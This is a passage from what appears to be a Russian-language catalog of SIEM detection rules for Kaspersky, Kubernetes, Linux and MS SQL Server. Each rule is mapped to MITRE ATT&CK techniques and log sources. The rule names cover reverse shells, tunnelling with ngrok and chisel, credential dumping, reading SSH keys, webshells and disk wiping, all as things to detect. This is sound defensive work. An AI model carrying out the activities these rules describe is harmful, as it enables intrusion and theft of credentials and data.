Kaspersky Security Center (GNRL_EV_VIRUS_FOUND_BY_KSN, GNRL_EV_VIRUS_FOUND, GNRL_EV_OBJECT_NOTCURED, GNRL_EV_OBJECT_REPORTED, EventID_00000139, EventID_000009fc)

Kaspersky

Kaspersky Security Center

RV-D-688

Подключение недоверенного устройства

TA0001 (Initial Access), TA0008 (Lateral Movement), TA0011 (Command and Control)

T1091 (Replication Through Removable Media), T1219 (Remote Access Tools), T1219.003 (Remote Access Tools: Remote Access Hardware)

Kaspersky Endpoint Security (GNRL_EV_DEVCTRL_DEV_PLUG_DENIED)

Kaspersky

Kaspersky Security Center

RV-D-766

Устройство давно не подключалось к серверу KSC

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Kaspersky Security Center (KLSRV_HOST_STATUS_CRITICAL)

Kubernetes

RV-D-102

Изменение файлов helm

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1543 (Create or Modify System Process), T1543.005 (Create or Modify System Process: Container Service)

Auditd

Kubernetes

RV-D-103

Привязка стандартных административных ролей k8s

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)

audit.log

Kubernetes

RV-D-104

Добавление кластерных ролей k8s

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)

audit.log

Kubernetes

RV-D-105

Удаление роли k8s

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)

audit.log

Kubernetes

RV-D-106

Добавление ролей k8s

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.006 (Account Manipulation: Additional Container Cluster Roles)

audit.log

Kubernetes

RV-D-510

Анонимный доступ к секретам k8s

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.007 (Unsecured Credentials: Container API)

audit.log

Kubernetes

RV-D-576

Изменение стандартов безопасности pod

TA0005 (Defense Evasion)

T1562 (Impair Defenses)

audit.log

Kubernetes

RV-D-577

Создание static pods

TA0003 (Persistence)

T1543 (Create or Modify System Process), T1543.005 (Create or Modify System Process: Container Service)

audit.log

Kubernetes

RV-D-637

Создание сервисного аккаунта k8s

TA0003 (Persistence)

T1136 (Create Account), T1136.001 (Create Account: Local Account)

audit.log

Kubernetes

RV-D-641

Неуспешный запрос от сервисного аккаунта k8s

TA0007 (Discovery)

T1613 (Container and Resource Discovery)

audit.log

Kubernetes

RV-D-642

Создание или изменение службы NodePort

TA0003 (Persistence)

T1133 (External Remote Services)

audit.log

Kubernetes

RV-D-645

Поиск разрешений сервисным аккаунтом k8s

TA0007 (Discovery)

T1069 (Permission Groups Discovery)

audit.log

Kubernetes

RV-D-646

Поиск секретов k8s

TA0007 (Discovery)

T1613 (Container and Resource Discovery)

audit.log

Kubernetes

RV-D-649

Запуск интерактивной оболочки в контейнере

TA0002 (Execution)

T1552 (Unsecured Credentials), T1552.007 (Unsecured Credentials: Container API), T1609 (Container Administration Command)

audit.log

Kubernetes

RV-D-751

Создание привилегированного пода k8s

TA0004 (Privilege Escalation)

T1610 (Deploy Container), T1611 (Escape to Host)

audit.log

Kubernetes

RV-D-752

Создание контейнера с Linux Capabilities

TA0004 (Privilege Escalation)

T1610 (Deploy Container), T1611 (Escape to Host)

audit.log

Kubernetes

RV-D-757

Назначение сервисного аккаунта контейнеру в kube-system

TA0004 (Privilege Escalation)

T1078 (Valid Accounts), T1078.001 (Valid Accounts: Default Accounts), T1098 (Account Manipulation)

audit.log

Linux

RV-D-107

Использование утилит для создания снимков экрана Linux

TA0009 (Collection)

T1113 (Screen Capture)

Auditd

Linux

RV-D-108

Загрузка файлов с удаленных ресурсов при помощи стандартных утилит

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Auditd

Linux

RV-D-109

Туннелирование с использованием ngrok в Linux

TA0011 (Command and Control)

T1090 (Proxy), T1090.002 (Proxy: External Proxy)

Auditd

Linux

RV-D-110

Загрузка файлов утилитой wget в директорию tmp

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

R-Point

Linux

RV-D-111

Чтение файлов с историей команд

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.003 (Unsecured Credentials: Bash History)

Auditd

Linux

RV-D-112

Чтение файлов с пользовательскими учетными данными

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.008 (OS Credential Dumping: /etc/passwd and /etc/shadow), T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files)

Auditd

Linux

RV-D-114

Подбор пароля на хосте Linux

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Auditd, auth.log, secure

Linux

RV-D-115

Успешный подбор пароля на хосте Linux

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)

Auditd, auth.log, secure

Linux

RV-D-116

Дамп памяти утилитой MimiPenguin на Linux

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.007 (OS Credential Dumping: Proc Filesystem), T1003.008 (OS Credential Dumping: /etc/passwd and /etc/shadow)

Auditd

Linux

RV-D-117

Вызов команды из модуля PAM

TA0006 (Credential Access), TA0005 (Defense Evasion), TA0003 (Persistence)

T1556 (Modify Authentication Process), T1556.003 (Modify Authentication Process: Pluggable Authentication Modules)

R-Point

Linux

RV-D-118

Чтение файлов с закрытыми ключами SSH

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.004 (Unsecured Credentials: Private Keys)

Auditd

Linux

RV-D-119

Чтение памяти процессов на Linux

TA0006 (Credential Access), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1003 (OS Credential Dumping), T1003.007 (OS Credential Dumping: Proc Filesystem), T1055 (Process Injection), T1055.009 (Process Injection: Proc Memory)

Auditd

Linux

RV-D-120

Доступ к критичным файлам SSSD

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.005 (OS Credential Dumping: Cached Domain Credentials), T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1558 (Steal or Forge Kerberos Tickets)

Auditd

Linux

RV-D-121

Подбор пароля пользователя Linux

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Auditd, auth.log, secure

Linux

RV-D-122

Успешный подбор пароля пользователя Linux

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Auditd, auth.log, secure

Linux

RV-D-123

Удаление файлов логирования в Linux

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs), T1070.003 (Indicator Removal: Clear Command History)

Auditd

Linux

RV-D-124

Загрузка подозрительного ebpf модуля

TA0005 (Defense Evasion)

T1014 (Rootkit)

Auditd

Linux

RV-D-125

Изменение конфигурационных файлов службы firewalld

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.004 (Impair Defenses: Disable or Modify System Firewall)

Auditd

Linux

RV-D-126

Изменение критичных файлов конфигурации интерактивной оболочки

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.003 (Indicator Removal: Clear Command History), T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification), T1562.003 (Impair Defenses: Impair Command History Logging)

Auditd

Linux

RV-D-127

Изменение конфигурационных файлов служб журналирования

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations), T1562 (Impair Defenses), T1562.006 (Impair Defenses: Indicator Blocking), T1562.012 (Impair Defenses: Disable or Modify Linux Audit System)

Auditd

Linux

RV-D-128

Копирование стандартных исполняемых файлов (маскарадинг утилит)

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.003 (Masquerading: Rename Legitimate Utilities)

Auditd

Linux

RV-D-129

Отключение или модификация Syslog Linux

TA0005 (Defense Evasion)

T1562.006 (Impair Defenses: Indicator Blocking)

Auditd

Linux

RV-D-130

Отключение службы firewalld

TA0005 (Defense Evasion)

T1562.004 (Impair Defenses: Disable or Modify System Firewall)

Auditd

Linux

RV-D-131

Отключение или изменение службы SELinux

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Auditd

Linux

RV-D-132

Изменение привилегий файлов Linux

TA0005 (Defense Evasion)

T1222 (File and Directory Permissions Modification), T1222.002 (File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification)

Auditd

Linux

RV-D-133

Создание/изменение скрытых файлов Linux

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Auditd

Linux

RV-D-134

Создание/изменение скрытых shared object файлов

TA0005 (Defense Evasion)

T1129 (Shared Modules), T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Auditd

Linux

RV-D-135

Загрузка кода в процесс Linux

TA0005 (Defense Evasion)

T1620 (Reflective Code Loading)

Auditd

Linux

RV-D-136

Изменение корневых сертификатов Linux

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.004 (Subvert Trust Controls: Install Root Certificate)

Auditd

Linux

RV-D-137

Изменение tmp файлов логирования Linux

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs)

Auditd

Linux

RV-D-138

Большое количество подозрительных команд

TA0007 (Discovery)

T1016 (System Network Configuration Discovery), T1057 (Process Discovery), T1082 (System Information Discovery), T1518 (Software Discovery)

Auditd

Linux

RV-D-139

Получение информации о текущем пользователе

TA0007 (Discovery)

T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account)

Auditd

Linux

RV-D-140

Разведка доменных УЗ в Linux

TA0007 (Discovery)

T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account)

Auditd

Linux

RV-D-141

Разведка локальных УЗ в Linux

TA0007 (Discovery)

T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account)

Auditd

Linux

RV-D-142

Разведка установленного ПО в Linux

TA0007 (Discovery)

T1518 (Software Discovery), T1518.001 (Software Discovery: Security Software Discovery), T1592 (Gather Victim Host Information), T1592.002 (Gather Victim Host Information: Software)

Auditd

Linux

RV-D-143

Поиск локализации системы Linux

TA0007 (Discovery)

T1614 (System Location Discovery), T1614.001 (System Location Discovery: System Language Discovery)

Auditd

Linux

RV-D-144

Поиск сетевых конфигураций

TA0007 (Discovery)

T1016 (System Network Configuration Discovery), T1016.001 (System Network Configuration Discovery: Internet Connection Discovery), T1590 (Gather Victim Network Information)

Auditd

Linux

RV-D-145

Разведка парольной политики в Linux

TA0007 (Discovery)

T1201 (Password Policy Discovery)

Auditd

Linux

RV-D-146

Разведка запущенных процессов в Linux

TA0007 (Discovery)

T1057 (Process Discovery)

Auditd

Linux

RV-D-147

Поиск окружения контейнера через proc VFS

TA0007 (Discovery)

T1082 (System Information Discovery)

R-Point

Linux

RV-D-148

Попытка обнаружения контейнеров через Inodes Listing

TA0007 (Discovery)

T1082 (System Information Discovery)

R-Point

Linux

RV-D-149

Использование сетевых утилит Linux для сканирования сети

TA0007 (Discovery), TA0043 (Reconnaissance)

T1046 (Network Service Discovery), T1595 (Active Scanning), T1595.001 (Active Scanning: Scanning IP Blocks)

Auditd

Linux

RV-D-150

Разведка Docker контейнеров через Dockerenv

TA0007 (Discovery)

T1082 (System Information Discovery)

R-Point

Linux

RV-D-151

Поиск файлов с suid/sgid битом

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid)

Auditd

Linux

RV-D-152

Подозрительное чтение домашней директории пользователя

TA0007 (Discovery)

T1083 (File and Directory Discovery)

Auditd

Linux

RV-D-153

Разведка системной информации Linux

TA0043 (Reconnaissance)

T1082 (System Information Discovery), T1592 (Gather Victim Host Information), T1592.004 (Gather Victim Host Information: Client Configurations)

Auditd

Linux

RV-D-154

Получена информация о системных службах на узле

TA0007 (Discovery)

T1007 (System Service Discovery)

Auditd

Linux

RV-D-155

Эксплуатация уязвимости CVE-2023-46944 в расширении GitLens для VSCode на Linux

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

Auditd

Linux

RV-D-156

Создание интерактивной оболочки через GTFOBins

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.011 (Command and Scripting Interpreter: Lua), T1218 (System Binary Proxy Execution)

Auditd

Linux

RV-D-157

Сетевое обращение от подозрительного скрипта в Linux

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1204 (User Execution), T1204.002 (User Execution: Malicious File)

Auditd

Linux

RV-D-158

Создание подозрительного Named Pipe с помощью Mkfifo

TA0002 (Execution)

T1559 (Inter-Process Communication)

R-Point

Linux

RV-D-159

Reverse-shell через Bash-сценарий

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell)

Auditd

Linux

RV-D-160

Создан Reverse-shell сторонней утилитой в Linux

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python)

Auditd

Linux

RV-D-161

Использование хакерской утилиты в Linux

TA0042 (Resource Development)

T1587 (Develop Capabilities)

Auditd

Linux

RV-D-162

Остановка критичных сервисов в Linux

TA0040 (Impact)

T1489 (Service Stop)

Auditd

Linux

RV-D-163

Загрузка файла с помощью утилит GTFOBins

TA0008 (Lateral Movement)

T1570 (Lateral Tool Transfer)

Auditd

Linux

RV-D-164

Создание туннелей и перенаправление трафика

TA0008 (Lateral Movement), TA0011 (Command and Control)

T1021 (Remote Services), T1021.004 (Remote Services: SSH), T1572 (Protocol Tunneling)

Auditd

Linux

RV-D-165

Загрузка файла сервисной учетной записью

TA0008 (Lateral Movement)

T1570 (Lateral Tool Transfer)

Auditd

Linux

RV-D-166

Разведка под сервисным пользователем

TA0007 (Discovery)

T1016 (System Network Configuration Discovery), T1046 (Network Service Discovery), T1082 (System Information Discovery), T1087 (Account Discovery), T1570 (Lateral Tool Transfer)

Auditd

Linux

RV-D-167

Изменение настроек пользователя

TA0003 (Persistence), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching), T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)

R-Point

Linux

RV-D-168

Создание и удаление уз в короткий период времени

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)

Auditd, auth.log, secure

Linux

RV-D-169

Изменение критичных файлов Linux

TA0006 (Credential Access), TA0005 (Defense Evasion), TA0003 (Persistence)

T1037 (Boot or Logon Initialization Scripts), T1037.004 (Boot or Logon Initialization Scripts: RC Scripts), T1070 (Indicator Removal), T1070.002 (Indicator Removal: Clear Linux or Mac System Logs), T1098 (Account Manipulation), T1098.004 (Account Manipulation: SSH Authorized Keys), T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification), T1556 (Modify Authentication Process), T1556.003 (Modify Authentication Process: Pluggable Authentication Modules), T1562.012 (Impair Defenses: Disable or Modify Linux Audit System), T1574 (Hijack Execution Flow), T1574.006 (Hijack Execution Flow: Dynamic Linker Hijacking)

Auditd

Linux

RV-D-170

Изменение задач cron

TA0003 (Persistence)

T1053 (Scheduled Task/Job), T1053.003 (Scheduled Task/Job: Cron)

Auditd

Linux

RV-D-171

Закрепление при помощи утилиты Trap

TA0004 (Privilege Escalation), TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.005 (Event Triggered Execution: Trap)

Auditd

Linux

RV-D-172

Добавление/удаление модулей ядра Linux

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1014 (Rootkit), T1547 (Boot or Logon Autostart Execution), T1547.006 (Boot or Logon Autostart Execution: Kernel Modules and Extensions)

Auditd

Linux

RV-D-173

Изменение библиотеки liblzma

TA0003 (Persistence)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1554 (Compromise Host Software Binary), T1556 (Modify Authentication Process)

Auditd

Linux

RV-D-175

Модификация правил udev

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1546 (Event Triggered Execution), T1546.017 (Event Triggered Execution: Udev Rules)

Auditd

Linux

RV-D-176

Создание пользователя или группы

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)

auth.log, Auditd, secure

Linux

RV-D-177

Закрепление в системе с использованием записей автозагрузки XDG

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1547 (Boot or Logon Autostart Execution), T1547.013 (Boot or Logon Autostart Execution: XDG Autostart Entries)

Auditd

Linux

RV-D-178

Создание/изменение правила nf_tables

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1068 (Exploitation for Privilege Escalation), T1562.004 (Impair Defenses: Disable or Modify System Firewall)

Auditd

Linux

RV-D-179

Повышение привилегий при помощи pkexec

TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation)

Auditd

Linux

RV-D-180

Внедрение процесса в другой через ptrace

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1055 (Process Injection), T1055.008 (Process Injection: Ptrace System Calls)

Auditd

Linux

RV-D-181

Повышение привилегий до root

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation), T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts), T1098 (Account Manipulation)

R-Point

Linux

RV-D-480

Использование утилиты SSHuttle для создания SSH-туннеля

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Auditd

Linux

RV-D-481

Создание файла через Python/Ruby сценарий

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.006 (Command and Scripting Interpreter: Python)

Auditd

Linux

RV-D-483

Злоупотребление сырыми сокетами

TA0011 (Command and Control)

T1095 (Non-Application Layer Protocol)

Auditd

Linux

RV-D-484

Изменение файлов в домашнем каталоге другим пользователем

TA0003 (Persistence)

T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

Auditd

Linux

RV-D-485

Подозрительное изменение директории /etc

TA0003 (Persistence)

T1053 (Scheduled Task/Job), T1053.003 (Scheduled Task/Job: Cron), T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification)

Auditd

Linux

RV-D-486

Загрузка webshell оболочки Linux

TA0003 (Persistence)

T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

Auditd

Linux

RV-D-487

Повышение привилегий с помощью GTFOBins

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.011 (Command and Scripting Interpreter: Lua), T1548 (Abuse Elevation Control Mechanism), T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid), T1548.003 (Abuse Elevation Control Mechanism: Sudo and Sudo Caching)

Auditd

Linux

RV-D-488

Использование утилиты fusermount

TA0004 (Privilege Escalation)

T1068 (Exploitation for Privilege Escalation)

Auditd

Linux

RV-D-489

Поиск данных в сетевых папках Linux

TA0009 (Collection)

T1039 (Data from Network Shared Drive)

Auditd

Linux

RV-D-492

Размещение архивов в сетевой папке Linux

TA0009 (Collection)

T1074 (Data Staged)

Auditd

Linux

RV-D-509

Уничтожение информации на диске в Linux

TA0040 (Impact)

T1561 (Disk Wipe), T1561.001 (Disk Wipe: Disk Content Wipe), T1561.002 (Disk Wipe: Disk Structure Wipe)

Auditd

Linux

RV-D-511

Обнаружена команда reverse/bind шелла

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.004 (Command and Scripting Interpreter: Unix Shell), T1059.006 (Command and Scripting Interpreter: Python)

Auditd

Linux

RV-D-516

Модификация файлов MOTD в Linux

TA0003 (Persistence)

T1546 (Event Triggered Execution), T1546.004 (Event Triggered Execution: Unix Shell Configuration Modification)

Auditd

Linux

RV-D-517

Модификация разрешений системных файлов в Linux

TA0003 (Persistence)

T1222 (File and Directory Permissions Modification), T1222.002 (File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification), T1548 (Abuse Elevation Control Mechanism), T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid)

Auditd

Linux

RV-D-518

Запуск утилиты msldapdump для разведки

TA0007 (Discovery)

T1018 (Remote System Discovery), T1046 (Network Service Discovery), T1069 (Permission Groups Discovery), T1069.002 (Permission Groups Discovery: Domain Groups), T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account), T1201 (Password Policy Discovery), T1615 (Group Policy Discovery)

Auditd

Linux

RV-D-536

Обнаружение стеганографии в Linux

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.003 (Obfuscated Files or Information: Steganography)

Auditd

Linux

RV-D-538

Извлечение содержимого буфера в Linux

TA0009 (Collection)

T1115 (Clipboard Data)

Auditd

Linux

RV-D-546

Изменение timers на хосте Linux

TA0002 (Execution)

T1053 (Scheduled Task/Job), T1053.006 (Scheduled Task/Job: Systemd Timers)

Auditd

Linux

RV-D-547

Чтение критичных файлов Linux

TA0009 (Collection)

T1005 (Data from Local System), T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files)

Auditd

Linux

RV-D-548

Использование утилиты at

TA0003 (Persistence)

T1053 (Scheduled Task/Job), T1053.002 (Scheduled Task/Job: At)

Auditd

Linux

RV-D-549

Изменение системных библиотек Linux

TA0003 (Persistence)

T1554 (Compromise Host Software Binary)

Auditd

Linux

RV-D-550

Изменение настроек для скрытия пользователей

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.002 (Hide Artifacts: Hidden Users)

Auditd

Linux

RV-D-572

Обнаружение компиляции исходного кода на Linux

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.004 (Obfuscated Files or Information: Compile After Delivery)

Auditd

Linux

RV-D-578

Запуск процесса с помощью ld.so

TA0003 (Persistence)

T1574 (Hijack Execution Flow), T1574.006 (Hijack Execution Flow: Dynamic Linker Hijacking)

Auditd

Linux

RV-D-579

Изменение бинарных файлов Linux

TA0003 (Persistence)

T1554 (Compromise Host Software Binary)

Auditd

Linux

RV-D-630

Атака regreSSHion

TA0001 (Initial Access)

T1190 (Exploit Public-Facing Application)

secure, auth

Linux

RV-D-657

Отключение мандатного контроля целостности

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Auditd

Linux

RV-D-685

Добавление файла в расширения браузера Linux

TA0003 (Persistence)

T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)

Auditd

Linux

RV-D-686

Добавление расширения в браузер через CLI Linux

TA0003 (Persistence)

T1176 (Software Extensions), T1176.001 (Software Extensions: Browser Extensions)

Auditd

Linux

RV-D-762

Аномальное bind-монтирование

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.013 (Hide Artifacts: Bind Mounts)

Auditd

Linux

RV-D-763

Злоупотребление расширенными атрибутами

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.014 (Hide Artifacts: Extended Attributes)

Auditd

Linux

RV-D-768

Использование chisel для туннелирования трафика

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Auditd

Microsoft

MSSQL

RV-D-632

Атака Password Spraying на MS SQL Server

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Application

Microsoft

MSSQL

RV-D-633

Подбор пароля к MS SQL Server

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Application

Microsoft

MSSQL

RV-D-634

Успешный подбор пароля MS SQL Server

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Application

Microsoft

MSSQL

RV-D-635

Вход привилегированного пользователя в MS SQL Server

TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

Application

Microsoft

MSSQL

RV-D-650

Изменение аудита базы данных MS SQL Server

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-651

Получение информации об аудите MS SQL Server

TA0007 (Discovery)

T1518 (Software Discovery), T1518.001 (Software Discovery: Security Software Discovery)

Application

Microsoft

MSSQL

RV-D-652

Создание резервной копии БД MS SQL Server

TA0006 (Credential Access), TA0009 (Collection)

T1003 (OS Credential Dumping), T1005 (Data from Local System), T1074 (Data Staged), T1074.001 (Data Staged: Local Data Staging)

dm_exec_cached_plans, PowerShell

Microsoft

MSSQL

RV-D-653

Удаление нескольких таблиц в MS SQL Server

TA0040 (Impact)

T1485 (Data Destruction)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-654

Удаление базы данных в MS SQL Server

TA0040 (Impact)

T1485 (Data Destruction)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-655

Назначена роль администратора пользователю MS SQL Server

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-656

Изменение пароля привилегированной УЗ MS SQL Server

TA0003 (Persistence)

T1098 (Account Manipulation)

Security, dm_exec_cached_plans

Microsoft

MSSQL

RV-D-683

Получение хеша пароля пользователей MSSQL

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-684

Получение информации о привилегиях пользователя MSSQL

TA0007 (Discovery)

T1087 (Account Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-689

Получение информации о версии MSSQL

TA0007 (Discovery)

T1082 (System Information Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-690

Получение информации о пользователях MSSQL

TA0007 (Discovery)

T1087 (Account Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-691

Поиск пользователей с административными правами в MSSQL

TA0007 (Discovery)

T1087 (Account Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-692

Доступ к локальной файловой системе MSSQL

TA0007 (Discovery)

T1083 (File and Directory Discovery), T1565 (Data Manipulation)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-693

Получение информации о пользователях ОС

TA0007 (Discovery)

T1087 (Account Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-694

Получение информации об алгоритме шифрования БД

TA0007 (Discovery)

T1082 (System Information Discovery), T1518 (Software Discovery), T1518.001 (Software Discovery: Security Software Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-695

Попытка включить смешанную аутентификацию MS SQL

TA0005 (Defense Evasion)

T1112 (Modify Registry), T1556 (Modify Authentication Process)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-697

Установка небезопасного свойства MS SQL

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1600 (Weaken Encryption)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-698

Отключение политики входа пользователей MS SQL

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation), T1562.001 (Impair Defenses: Disable or Modify Tools)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-699

Включение небезопасных параметров в конфигурации MSSQL

TA0003 (Persistence), TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service), T1562.001 (Impair Defenses: Disable or Modify Tools)

Application

Microsoft

MSSQL

RV-D-700

Создание резервных копий MSSQL средствами PowerShell

TA0009 (Collection)

T1074 (Data Staged), T1213 (Data from Information Repositories)

PowerShell

Microsoft

MSSQL

RV-D-716

Использование процедур для локального выполнения кода

TA0002 (Execution)

T1059 (Command and Scripting Interpreter)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-717

Отправка результатов SQL-запроса почтой

TA0010 (Exfiltration)

T1567 (Exfiltration Over Web Service)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-734

Чтение ключа реестра средствами MSSQL

TA0007 (Discovery)

T1012 (Query Registry), T1082 (System Information Discovery)

Application

Microsoft

MSSQL

RV-D-735

Запись ключа реестра средствами MSSQL

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Application

Microsoft

MSSQL

RV-D-736

Попытка изменить состояние службы Windows

TA0040 (Impact), TA0002 (Execution)

T1489 (Service Stop), T1569 (System Services), T1569.002 (System Services: Service Execution)

Application

Microsoft

MSSQL

RV-D-737

Попытка получить состояние службы Windows

TA0007 (Discovery)

T1007 (System Service Discovery), T1505 (Server Software Component), T1505.001 (Server Software Component: SQL Stored Procedures)

Application

Microsoft

MSSQL

RV-D-738

Попытка подключения к CУБД через DAC

TA0003 (Persistence)

T1505 (Server Software Component)

Application

Microsoft

MSSQL

RV-D-755

Использование хранимых процедур sp_proxy и sp_grant_proxy

TA0003 (Persistence), TA0005 (Defense Evasion)

T1505 (Server Software Component), T1505.001 (Server Software Component: SQL Stored Procedures), T1548 (Abuse Elevation Control Mechanism)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-756

Поиск резервных копий базы данных

TA0007 (Discovery), TA0003 (Persistence)

T1083 (File and Directory Discovery)

dm_exec_cached_plans

Microsoft

MSSQL

RV-D-758

Выгрузка ключа шифрования или сертификата MSSQL

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.004 (Unsecured Credentials: Private Keys), T1649 (Steal or Forge Authentication Certificates)

